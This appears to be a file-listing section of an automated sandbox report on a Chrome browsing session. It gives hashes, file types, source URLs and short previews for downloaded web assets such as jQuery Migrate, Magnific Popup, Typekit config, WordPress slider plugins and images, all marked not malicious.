                                                                                                                                                                                                                                                                                SHA-256:F4965EBFE3EB46E3D8FA8E9D71296D5B91F3C0F48333D953F0CC8C37619076F9
                                                                                                                                                                                                                                                                                SHA-512:501D6191DBD835C0A55805778A2601B5F3CCF98AC55787569D7253C9C813DE7A34BA2964B63346A8CC75D742D4D23B2E86233E355AE8945D156D97EB3ABCF32C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/cherry-framework/modules/cherry-js-core/assets/js/min/cherry-js-core.min.js?ver=1.1.2
                                                                                                                                                                                                                                                                                Preview:var CherryJsCore={};!function(r){"use strict";CherryJsCore={name:"Cherry Js Core",version:"1.0.0",author:"Cherry Team",variable:{$document:r(document),$window:r(window),browser:r.browser,browser_supported:!0,security:window.cherry_ajax,loaded_assets:{script:window.wp_load_script,style:window.wp_load_style},ui_auto_init:"true"===window.ui_init_object.auto_init,ui_auto_target:window.ui_init_object.targets},status:{on_load:!1,is_ready:!1},init:function(){CherryJsCore.set_variable(),r(document).on("ready",CherryJsCore.ready),r(window).on("load",CherryJsCore.load)},set_variable:function(){CherryJsCore.variable.browser_supported=function(){var r=CherryJsCore.variable.browser,e={msie:[8]};for(var i in e)if("undefined"!==r.browser)for(var o in e[i])if(r.version<=e[i][o])return!1;return!0}()},ready:function(){CherryJsCore.status.is_ready=!0,CherryJsCore.expressions.widget_ui_init()},load:function(){CherryJsCore.status.on_load=!0},expressions:{widget_ui_init:function(){r(document).on("widget-add
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (13479)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):13577
                                                                                                                                                                                                                                                                                Entropy (8bit):5.272065782731947
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                                                                                                                                                                                MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                                                                                                                                                                SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                                                                                                                                                                SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                                                                                                                                                                SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                                                                                                                Entropy (8bit):6.777455085845385
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:h2rSKGl2k7oll4QGWeOd4IFhGNXNPUPEzKLFygQPWEBOOWo:h2rSK75ll4zWeOd4WGPUPEzKLFfo
                                                                                                                                                                                                                                                                                MD5:246B58DC2B3992E2E2D25F3AFFF7697B
                                                                                                                                                                                                                                                                                SHA1:E59FC04AA0D6C4A56E3CB2CA37C6BCD8C43B0E93
                                                                                                                                                                                                                                                                                SHA-256:A67EAC38498262D03500CF329CBF05380DF3C03FB1BF1851F977F2D963D3AE4B
                                                                                                                                                                                                                                                                                SHA-512:309332657CBE062B7355F80A4AA6BA8852E6C6B1088FE02A9CB665B38EAA614D067BEBAE8D0BAF27D62DDD6207B51BED53A70B4CCC721EF5CC5EF544FF67D438
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/uploads/2018/03/cropped-ChristianMingle_Logo_App_Trans_rectangle_180x120-32x32.png
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....D.......PLTE..y..v..q..n..k..g..c..^..[..W..S..T..U..T..S..O..Q.._..}..............o..X..P..K..K..N..m....................................l..P..K..L..L..G..G..Z...................w..w..}................w..N..G..J..x..\..D..E..m..........j..Q..F..D..D..D..D..F..O..e........r.......j..@..R......O..A..@..A..N..........h..B..=..A..}......i..H..>..=..=..>..H..i............_..>..8..:..e..............a..S..M..L..O..X..h.............I..9..@.........A..8..4..4..B..z.....................................q..C..5..A.........@..0..1..;..]...................t..M..5..1..0..Z.......9..-..-..0..5..;..:..2.....-..1..a..;..-..)..)..)..%..!.........................^.b....IDAT8.c` .....&.....``!..X...6.....`. ..8..........B.... ($,"*&.!)%...ddddd......UT..54..ut.ddd..ddddd......ML..-,..ml......]\..=<.........}|......C...B..#"..cb.............SR....@FfVvNn^bbbb"C~~AaQqIiYy>.TTVU....746....3477....wtvu....O.8i...9k.......?..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (2258)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):17331
                                                                                                                                                                                                                                                                                Entropy (8bit):5.557311468425655
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:bJBI2hpIgIVsUGiRm4lIeU4iDFeFs2NdFJsQF+i:dBg7GiRm4X0JqsG7Ui
                                                                                                                                                                                                                                                                                MD5:84323021538FDE07424FFE521470E9FC
                                                                                                                                                                                                                                                                                SHA1:5CE000B5E0224D69B6BE16E3222775ABFF3D0049
                                                                                                                                                                                                                                                                                SHA-256:443D33422DB29E80060AA1DE97500F473AB520E10092CF0E57CBC658B03D25A9
                                                                                                                                                                                                                                                                                SHA-512:5D6A0BA386A7CBD07B33FEA4EA4622DA9C8D3754AB2FBE71CB45D639EE448829E76BF1935266085898CFD9627B299F6B21F3B0B66389BD5E20495FA372ED43EC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * halyard-display:. * - http://typekit.com/eulas/00000000000000007735adb1. * - http://typekit.com/eulas/00000000000000007735adc9. * - http://typekit.com/eulas/00000000000000007735adb4. * - http://typekit.com/eulas/00000000000000007735adcc. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"646866","fi":[34661,34669,34662,34670],"fc":[{"id":34661,"family":"halyard-display","src":"https://use.typekit.net/af/272149/00000000000000007735adb1/30/{format}{?primer,subset_id,fvd,v}","descriptors":{"weight":"300","style":"normal","stretch":"normal","display":"auto","variable":false,"subset_id":2}},{"id":34669,"family":"halyard-display","src":"https://use.typ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20087), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20219
                                                                                                                                                                                                                                                                                Entropy (8bit):5.340030935431211
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:iPhVPXQ2G2XAQyqVxRQ5giCCMLtA15h5/F6l8aZwHwztLCpmst:iPBIt8I5h5t1qkOLCMst
                                                                                                                                                                                                                                                                                MD5:B37D7EDF99565D3858EAA1AD80DF3CFF
                                                                                                                                                                                                                                                                                SHA1:786A4343711E9AF5E5DFCC493E7D2331B48875BB
                                                                                                                                                                                                                                                                                SHA-256:B0A45CD5AED66E27BD8EE861D0E3B782C8E79849BDE32F90F078B9F2451A36F2
                                                                                                                                                                                                                                                                                SHA-512:A48797BF6796AB59E1B40003C98AC999A877C8B07ADBF317B087FF49046C943A11C3922B92F228E88C1C770B1E4D80B75240C79E9958DE50FCF1FBB9C35DBD1A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! Magnific Popup - v1.1.0 - 2016-02-20..* http://dimsemenov.com/plugins/magnific-popup/..* Copyright (c) 2016 Dmitry Semenov; */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (541)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):363468
                                                                                                                                                                                                                                                                                Entropy (8bit):4.8905433877028175
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:fAwq5BI/Z+apmBhcAmE8W5jSDq8OGtHNwwYwsar6Z6Is9ZQm8iKF10IXc6OFyJxk:PpmBhcAmE8W5jSDq8OGtHNwwYwsar6Zq
                                                                                                                                                                                                                                                                                MD5:882F64E04E4D1B1D9F43D07D9FE190E5
                                                                                                                                                                                                                                                                                SHA1:60F09E4FE6FFA35C4E80D6FE26F055940A243B9D
                                                                                                                                                                                                                                                                                SHA-256:EEEF658D8EFB642D65BB227750F7A49709EFB4C9E5DCEBAE97EC90DD6CAF3D1E
                                                                                                                                                                                                                                                                                SHA-512:A413C5BBE49B3C87B3F88D68680BA0D289FBD17544B31E2C619855691BAF6E63EBFBB526F1BE319D9F2CB53D37793563B802C954837D16CDB7650D0E4F8E6077
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://kengegame.web.app/core-awesome.min.css
                                                                                                                                                                                                                                                                                Preview:type="text/css">@font-face {. font-family: 'icomoon';. src: url("https://ruletridominium.web.app/0f339c2e26ad0c91253064ed7796c40d9801e40e.ttf") format("truetype"), url("https://ruletridominium.web.app/5ad55f8d768f0d8bd5328d88a9415790046714fc") format("woff"), url("https://ruletridominium.web.app/9559e5d016ed768aad8ba558bc2783ea.svg") format("svg");. font-weight: normal;. font-style: normal;. font-display: block; }..[class^="icon-"], [class*=" icon-"] {. /* use !important to prevent issues with browser extensions that change fonts */. font-family: 'icomoon' !important;. speak: none;. font-style: normal;. font-weight: normal;. font-variant: normal;. text-transform: none;. line-height: 1;. /* Better Font Rendering =========== */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale; }...icon-apple:before {. content: "\E90C"; }...icon-mug:before {. content: "\E900"; }...icon-activity:before {. content: "\E901"; }...icon-star:before {. content: "\E902
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12150)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):12323
                                                                                                                                                                                                                                                                                Entropy (8bit):5.494318505273094
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:bv4HuJvASHqjVZxtg42IzLneuc+52J++t+8/Szz/6ue+obi/OpjP8zK8biPAm7Re:bAeYz/2wLnen+yU7l7kj0k4ME
                                                                                                                                                                                                                                                                                MD5:AF70089388D2E92FA660172F1F449799
                                                                                                                                                                                                                                                                                SHA1:D12240C5CE7ABFD30074F26A5C1AC547AA6B080A
                                                                                                                                                                                                                                                                                SHA-256:4270F6608898CF342A0E14AB64F7B557CE7E5A81CB311FF5B60F8C2A3291C015
                                                                                                                                                                                                                                                                                SHA-512:89C15B99B97777BD7810D34F41B95D2ADC517A6FA6EFB6354A2237DE59476C43907482BEF2233BD13AB5796DBE05B363C007DA22AB5473BE628CF53C187D7C34
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/2775-b1c0136b925e8dc5943e-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[2775],{154229:c=>{c.exports={}},273549:c=>{c.exports={}},801563:c=>{c.exports={}},896766:c=>{c.exports={}},801579:(c,e,t)=>{"use strict";var n=t(875832);Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var u=n(t(987195)),s=n(t(845076)),a=n(t(174161)),m=t(647871);t(154229);var i=f=>{var r=f.checked,v=f.onChange,A=f.inputProps,d=()=>{v(!r)};return a.default.createElement("div",{className:"toggle-wrapper"},a.default.createElement("p",{"aria-hidden":"true"},r?(0,m.t)("On",null,{project:"gdpr-cookie-banner",notes:"A toggle is on"}):(0,m.t)("Off",null,{project:"gdpr-cookie-banner",notes:"A toggle is off"})),a.default.createElement("label",{className:(0,s.default)("sqs-toggle",{checked:r,"sqs-toggle--on":r,"sqs-toggle--off":!r})},a.default.createElement("input",(0,u.default)({type:"checkbox",checked:r,onChange:d},A))))},E=e.default=i;c.exports=e.default},932138:(c,e)=>{"use strict";Object.defineProperty(e,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1280x850, components 3
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):68087
                                                                                                                                                                                                                                                                                Entropy (8bit):7.97529903295912
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:LGaLrXCh8XxAATjbRs2vAMh1xE1DzRmhAKaViMCuKARc:3PnxbTjjjxIYhubCuKARc
                                                                                                                                                                                                                                                                                MD5:C38B46548211DC0A01B864DE5360FF89
                                                                                                                                                                                                                                                                                SHA1:9945AE1DC96E0D5C4F1418537AC87EE7C1C1666E
                                                                                                                                                                                                                                                                                SHA-256:92DD595E4C12D25880298423D31B60D2826C57F8525E5CB6DEBB6C1C80388CB2
                                                                                                                                                                                                                                                                                SHA-512:3EE23E3C50D5281C5F600FC2C1CF314FD42F3439EE069F57821FB2C7D47882AD6E0A3C2A1E26485DDE0A11E3CC2FA976EA8865EB1B79BAC16EC1DD9AE133AFF9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/c38b46548211dc0a01b864de5360ff89.jpg
                                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......F.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:DFFA30EF47C311E7804DAC0C3AE69BEE" xmpMM:DocumentID="xmp.did:DFFA30F047C311E7804DAC0C3AE69BEE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DFFA30ED47C311E7804DAC0C3AE69BEE" stRef:documentID="xmp.did:DFFA30EE47C311E7804DAC0C3AE69BEE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................ $.' ",#..(7),01444.'9=82<.342...........2!.!2222222222222222
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):16422
                                                                                                                                                                                                                                                                                Entropy (8bit):4.582238084395129
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:jwgBAnF1UclxkxsE5QAvXMZQfeVemfeDNWSkr5+3LiBZGKCVemkeTd5/7x:jwgBAnqZNWSaKd5/7x
                                                                                                                                                                                                                                                                                MD5:C438E14F00765983D9D40C71C6856926
                                                                                                                                                                                                                                                                                SHA1:A37898CCE970FE50A7814384CDEE7A12D00E078F
                                                                                                                                                                                                                                                                                SHA-256:167C030ABF8B8CB9FC0717747FA0398EF0261262CCABF0F149C2F6E4A457361A
                                                                                                                                                                                                                                                                                SHA-512:0D22BC3E324801489574AACD4318C02C8A56C5C3512972117D8AA4E06D2602A48A6D9AAC532D5929C2FD6DACB05A3C8568A09DBDBF0546AADD4C0EC8F5B9E3E7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-carousel.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:(function($) {. $.tm_pb_simple_carousel = function(el, options) {. var settings = $.extend( {. slide_duration.: 500,. }, options );.. var $tm_carousel ...= $(el),. $carousel_items ..= $tm_carousel.find('.tm_pb_carousel_items'),. $the_carousel_items .= $carousel_items.find('.tm_pb_carousel_item');.. $tm_carousel.tm_animation_running = false;.. $tm_carousel.addClass('container-width-change-notify').on('containerWidthChanged', function( event ){. set_carousel_columns( $tm_carousel );. set_carousel_height( $tm_carousel );. });.. $carousel_items.data('items', $the_carousel_items.toArray() );. $tm_carousel.data('columns_setting_up', false );.. $carousel_items.prepend('<div class="tm-pb-slider-arrows"><a class="tm-pb-slider-arrow et-pb-arrow-prev" href="#">' + '<span>' + tm_pb_custom.previous + '</span>' + '</a><a class="tm-pb-slider-arrow et-pb-arrow-next" href="#">' + '<span>' + tm_pb_custom.next + '</span>' + '</a></div>');.. set_caro
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):601277
                                                                                                                                                                                                                                                                                Entropy (8bit):7.991850463420538
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:12288:Iv7kgsP5Gb8mH6vxeKxpUCv2UeNDWWPr3V9gbNVr:ZzxGotv0KzUCv2HDWMXghVr
                                                                                                                                                                                                                                                                                MD5:74197863524931C2E818F9E057E112AC
                                                                                                                                                                                                                                                                                SHA1:F6A829972282EDBDA8B5AA6A8295E692C6973BB5
                                                                                                                                                                                                                                                                                SHA-256:B6C6C0556BFC84905669C12A5F8529F400E4FA11EA5205F54454606299B835CB
                                                                                                                                                                                                                                                                                SHA-512:CC57C0D6AA1F4063904263D0EC80207672782A9E8EDEF934C6E535559447E2F9AE72C9B828CA6FCCFCF122DAB69F75A80E03CAFD67906632D0CBEC32A37D357A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs............... .IDATx...K.$I...S5s....z.sz....].fV..$(......H.EH.(..G...p.W^..x.g.....f........wwUefD..*.j....dHWg.G......_.&........Q...v.......?......1.[....=.... qI`..".....rw.=...Y...o.p........I...Z.>^...5.S..k.{...;.< .. ...+.t....{....d.,..~......Q....m....$UD......"*d.DS..C..r.[....FZO<(.f..../....+.".O@e...)....q...m:..Sj.X+g.s..[(..I..).s&..g.......%..n`............6E.7N...F...s..z..p......w....7.=....o\=....]N.......9.O.BN......+.<.!...[...^.|..|.7.|vk.<.y..R.,+..T8......O//yzq..+..^.7_Q_. ..P.F.....9......./O....N.q.1#.ru....W....O.;..".yRo.\.7.Vp.r...../_|.o.y.....&....K.a...r.[.........~.x<..:.......2.n..|..'.._.........$'.42=z.o.....]...m..8.O.|...............i7....................q.n...j"....(..i...'..y.g.._...._......nnO.;.n..w......=~..o0......|.j..t.<...V../..._..7_Q.3...n..#..)..."..?........?{.WO9......./U.u....L9...'.?../....~.K~....:.;..>..;$QJ9Qk...+.y.....0N...'.....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):184562
                                                                                                                                                                                                                                                                                Entropy (8bit):5.629007297098108
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:B57rVrIIJLjJkPCmgev/fZ64PATDEBBaNCuclzoS/XBCy4y7kh6GUCWB1R20rNTa:B57rVrIIJLjJkeevnZ64PA/uaNCuclc1
                                                                                                                                                                                                                                                                                MD5:BB161E955A3C970CDD870A4EC0BD6D7F
                                                                                                                                                                                                                                                                                SHA1:125E1DA1CD7BF3BBFEB22D24D8D8CCF70800D71A
                                                                                                                                                                                                                                                                                SHA-256:FB4171324646676906D68D37FC0E678AAF5655E0A910D565CBCA48771B727506
                                                                                                                                                                                                                                                                                SHA-512:B4052D4A5CE7CF80F9C5EE4E3960F7B18F0F4E2B347B4D740E0B03F52362488E60A4853498377CFD4E86E53FE6992B9F067F79EAFAC0435D7CD212637FEB861A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://maps-api-ssl.google.com/maps-api-v3/api/js/57/13/util.js
                                                                                                                                                                                                                                                                                Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var jwa,iwa,lwa,nwa,owa,pwa,qwa,swa,cE,eE,fE,uwa,jE,wwa,kE,ywa,lE,Awa,zwa,Bwa,Cwa,Dwa,Ewa,Fwa,Gwa,Hwa,Iwa,Jwa,Kwa,Lwa,Mwa,Nwa,Owa,Pwa,Qwa,Rwa,Swa,Twa,pE,Wwa,rE,Xwa,Ywa,Zwa,$wa,axa,bxa,cxa,dxa,exa,fxa,gxa,ixa,kxa,mxa,oxa,qxa,sxa,uxa,wxa,yxa,Axa,Bxa,Cxa,Dxa,Exa,Fxa,Gxa,Hxa,sE,Ixa,Jxa,Kxa,Lxa,Mxa,Nxa,Pxa,uE,vE,Qxa,Rxa,Sxa,Txa,Uxa,Vxa,Wxa,Xxa,Yxa,Zxa,$xa,wE,aya,xE,bya,cya,dya,eya,fya,gya,hya,yE,iya,zE,jya,kya,lya,mya,nya,oya,pya,qya,rya,sya,tya,uya,vya,wya,xya,yya,zya,Aya,Bya,Dya,Eya,Fya,Hya,BE,Iya,Jya,.Kya,Lya,Mya,Nya,Oya,Qya,Rya,Sya,Wya,Xya,Zya,bza,cza,dza,eza,YE,ZE,$E,aF,cF,iza,dF,jza,eF,fF,gF,hF,iF,kza,lza,mza,oza,pza,jF,qza,nza,tza,uza,nF,yza,Cza,Dza,Eza,Fza,rF,Gza,Iza,Jza,Kza,Lza,uF,Nza,Tza,BF,Wza,Vza,CF,IF,Yza,Zza,$za,bAa,cAa,cG,eAa,dG,fAa,gAa,hAa,iAa,fG,kAa,jAa,lAa,nAa,pAa,rAa,vAa,tAa,wAa,uAa,gG,hG,zAa,AAa,iG,jG,BAa,DAa,lG,mG,CAa,FAa,oG,pG,GAa,qG,HAa,sG,tG,IAa,uG,vG,JAa,wG,P
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):15560
                                                                                                                                                                                                                                                                                Entropy (8bit):4.552622484646198
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:JTrEjk3Vmt9YCIHsLUw8XoAfY/N9u91lQ8E:BrEjk3VmtKCZLUOAaCQ8E
                                                                                                                                                                                                                                                                                MD5:4E27313156FC6087882F7F669CD7C702
                                                                                                                                                                                                                                                                                SHA1:E2D0D190797C9994F9D98F0C61BDED23F8021AAE
                                                                                                                                                                                                                                                                                SHA-256:785B2102F538E88A3C1D3535CF5E3E0786D2CD3518F1B8F5D656DAB7CB9F3505
                                                                                                                                                                                                                                                                                SHA-512:8346ED6A2340F7B8C075DF702D038C48CD3AADAE0CD79F19DF2A9721CE3CABD275525666A06B4DAF32B8E16E6E48E428D0740B9B07D8EFFC6FA3BDCAB335E886
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-slider.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:(function($) {. $.tm_pb_simple_slider = function(el, options) {. var settings = $.extend( {. slide ...: '.tm-slide',.... .// slide class. arrows.....: '.tm-pb-slider-arrows',..// arrows container class. prev_arrow....: '.tm-pb-arrow-prev',...// left arrow class. next_arrow....: '.tm-pb-arrow-next',...// right arrow class. controls ....: '.tm-pb-controllers a',..// control selector. carousel_controls ..: '.tm_pb_carousel_item',..// carousel control selector. control_active_class.: 'tm-pb-active-control',..// active control class name. previous_text...: tm_pb_custom.previous,...// previous arrow text. next_text....: tm_pb_custom.next,....// next arrow text. fade_speed....: 500,.......// fade effect speed. use_arrows....: true,.......// use arrows?. use_controls...: true,.......// use controls?. manual_arrows...: '',.......// html code for custom arrows. append_controls_to..: '',.......// controls are append
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (7601)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1196442
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1035903434727325
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:MWNxfRLBd1hrREjXWJ5hHDUWKx4t5k+1UBavZPka+k7BaCnlOkYFYpZdI2K:ZxfdBd1hrRemJ3jUWKxa5kTkLpPI2K
                                                                                                                                                                                                                                                                                MD5:850267DB771BB0D73B078A69C0E515F5
                                                                                                                                                                                                                                                                                SHA1:A7A0E12E74981239191E016672FAA47BC1C29245
                                                                                                                                                                                                                                                                                SHA-256:94749A9A2A419C6962EA8C3634AEE02DA5FC8FC73054DC956EEADF710EC90BD5
                                                                                                                                                                                                                                                                                SHA-512:B814669A6CC3733BD8EC523083D9413B4A2638F113A09DAB321AFC39D67C4553ECDCE575FBD9740E61DE3DE6A8F695BE0AE90075DCBBCB245A3FCAF03EB7E046
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-6c569122bfa66a51a056-min.en-US.js
